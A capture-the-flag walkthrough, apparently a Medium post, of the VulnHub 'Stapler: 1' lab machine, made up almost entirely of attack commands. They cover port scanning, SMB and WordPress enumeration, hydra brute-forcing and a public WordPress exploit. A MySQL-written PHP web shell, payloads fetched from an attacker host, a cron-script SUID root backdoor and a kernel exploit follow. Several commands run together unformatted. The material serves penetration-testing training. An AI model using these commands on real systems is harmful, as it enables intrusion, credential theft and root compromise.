VulnHub: STAPLER: 1

  1. Network discovery
nmap -sn 10.0.2.32/24
nmap -Pn 10.0.2.31nmap -Pn -p1000- 10.0.2.31
nmap -A -p20,21,22,53,80,139,666,3306,12380 10.0.2.31
  • port 21 vsftpd w/ anonymous login
  • port 22 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
  • port 53 dnsmasq 2.75
  • port 80 PHP cli server 5.5 or later
  • port 139 netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
  • port 666 doom
  • port 3306 MySQL 5.7.12–0ubuntu1
  • port 12380 Apache httpd 2.4.18 ((Ubuntu))
nmap --script vuln -p20,21,22,53,80,139,666,3306,12380 10.0.2.31
  • port 21 vsftpd 3.0.3 w/ anonymous login
ftp 10.0.2.31username: anonymous
ls -la
get note
cat note
  • port 22 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
ssh 10.0.2.31
  • port 53 dnsmasq 2.75
dig -x 10.0.2.31 @10.0.2.31
  • port 80 PHP cli server 5.5 or later
nikto -h http://10.0.2.31
wget http://10.0.2.31/.bashrcwget http://10.0.2.31/.profile
cat .bashrc
cat .profile
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.31/ -x php,txt,html,sh,cgi -q
  • port 139 netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
nmap -p 139 --script=smb-enum-shares.nse,smb-enum-users.nse 10.0.2.31
enum4linux -a 10.0.2.31 > enum4linux.txt
smbclient //10.0.2.31/kathydir
cd kathy_stuffdirget to_do-list.txt
cd ../backupget vsftpd.confget wordpress-4.tar.gz
cat todo-list.txt
cat vsftpd.conf
tar -xzvf wordpress-4.tar.gzcd wordpressfind . -name '*.php' | grep configcat ./wp-config-sample.php
  • port 666 doom
nc -nv 10.0.2.31 666
nc -nv 10.0.2.31 666 > message.jpgls -la
exiftool message.jpg
unzip message.jpg
smbclient //10.0.2.31/tmp
  • port 3306 MySQL 5.7.12–0ubuntu1
  • port 12380 Apache httpd 2.4.18 ((Ubuntu))
nikto -h http://10.0.2.31:12380
nikto -h https://10.0.2.31:12380
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u https://10.0.2.31:12380/ -x php,txt,html,sh,cgi -q -k
wpscan --url https://10.0.2.31:12380/blogblog/ -et -ep -eu --disable-tls-checks
wpscan --url https://10.0.2.31:12380/blogblog/ --disable-tls-checks --plugins-detection aggressive
  1. FTP Port 21 — brute-forcing
  2. SSH Port 22 — brute-forcing
  3. HTTP(S) Port 12380 — brute-forcing and public exploit
hydra -L users.txt -P users.txt ftp://10.0.2.31
ftp 10.0.2.31username: SHayslettpassword: SHayslettls -la
hydra -L users.txt -P users.txt 10.0.2.31 ssh -t 4 -u -F -V
ssh SHayslett@10.0.2.31
wpscan --url https://10.0.2.31:12380/blogblog/ --disable-tls-checks -P ~/Desktop/rockyou.txt
python 39646.py
mysql -h 10.0.2.31 -uroot -pplbkac
/var/www/https/blogblog/wp-content/uploads/
use mysqlSelect "<?php echo shell_exec($_GET['cmd']);?>" into outfile   "/var/www/https/blogblog/wp-content/uploads/shell.php";
rlwrap nc -lvp 443
python -c ‘import pty;pty.spawn(“/bin/bash”);’
  1. Explore directory as listed
/opt/tmp/var/log/var/www/https//var/mail
python -m SimpleHTTPServer 80
cd /tmpwget http://10.0.2.32/LinEnum.shchmod 777 LinEnum.sh./LinEnum.sh
  • Login as peter and verify sudo
su peterPassword: JZQuyIN5
sudo -l
sudo suwhoami
  • cronjob
cat /etc/cron.d/logrotate
ls -la /usr/local/sbin/cron-logrotate.sh
cat /usr/local/sbin/cron-logrotate.sh
echo "cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash" >> /usr/local/sbin/cron-logrotate.shcat /usr/local/sbin/cron-logrotate.sh
ls -la
/tmp/rootbash -p
  • kernel exploitation
uname -a
searchsploit linux kernel 4.4
searchsploit -m 39772cat 39772.txt
tar -xvf exploit.tar
wget http:/10.0.2.32/hello.cwget http:/10.0.2.32/suidhelper.cwget http:/10.0.2.32/doubleput.cwget http:/10.0.2.32/compile.sh./compile.sh

--

--

Get the Medium app